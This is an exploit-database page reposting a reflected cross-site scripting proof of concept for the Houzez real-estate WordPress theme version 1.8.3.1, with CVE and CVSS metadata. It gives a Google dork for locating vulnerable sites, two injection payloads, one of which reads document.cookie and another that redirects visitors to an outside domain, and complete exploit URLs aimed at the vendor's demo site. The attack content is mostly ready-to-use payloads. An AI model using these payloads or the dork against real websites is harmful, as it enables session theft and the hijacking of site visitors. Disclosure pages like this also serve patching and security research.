Advertisement






Houzez - Real Estate WordPress Theme v1.8.3.1 Reflected XSS

CVE Category Price Severity
CVE-2021-39377 CWE-79 $500 High
Author Risk Exploitation Type Date
ExploitAlert Team High Remote 2020-01-11
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010090

Below is a copy:

Houzez - Real Estate WordPress Theme v1.8.3.1 Reflected XSS
# Exploit Title: Houzez - Real Estate WordPress Theme v1.8.3.1 Reflected XSS
# Google Dork: /wp-content/themes/houzez/
# Date: 11/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://houzez.co/
# Software Link: https://themeforest.net/item/houzez-real-estate-wordpress-theme/15752549
# Version: 1.8.3.1
# Tested on: Kali Linux
# CVE: -
# CWE: 79


----[]- Info: -[]----
Demo website: https://houzez04.favethemes.com/


----[]- Reflected XSS: -[]----
Payload Sample #0: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
Payload Sample #1: "><img src=x onerror=alert(document.cookie)>

PoC #0: https://houzez04.favethemes.com/advanced-search/?keyword=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60m0ze%60%29%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location=&area=&status=&type=&bedrooms=&bathrooms=&min-area=&max-area=&min-price=%24200&max-price=%24500%2C000

PoC #1: https://houzez04.favethemes.com/agent/?agent_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&category=&city=

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum